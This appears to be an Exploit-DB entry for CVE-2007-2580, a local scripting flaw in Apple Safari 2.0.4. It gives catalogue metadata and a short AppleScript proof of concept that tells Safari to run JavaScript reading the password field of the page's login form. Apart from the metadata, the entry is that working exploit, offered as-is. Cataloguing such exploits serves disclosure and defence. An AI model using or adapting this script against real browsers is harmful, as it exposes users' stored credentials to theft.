Apple 2.0.4 - Safari Local Cross-Site Scripting

Author: poplix
type: local
platform: osx
port: 
date_added: 2007-05-04  
date_updated: 2017-11-22  
verified: 1  
codes: CVE-2007-2580;OSVDB-35569  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29950.js  

source: https://www.securityfocus.com/bid/23825/info

Apple Safari is prone to an unspecified local vulnerability.

tell application "Safari"
        do JavaScript "alert(document.loginform.password.value)" in document 1
end tell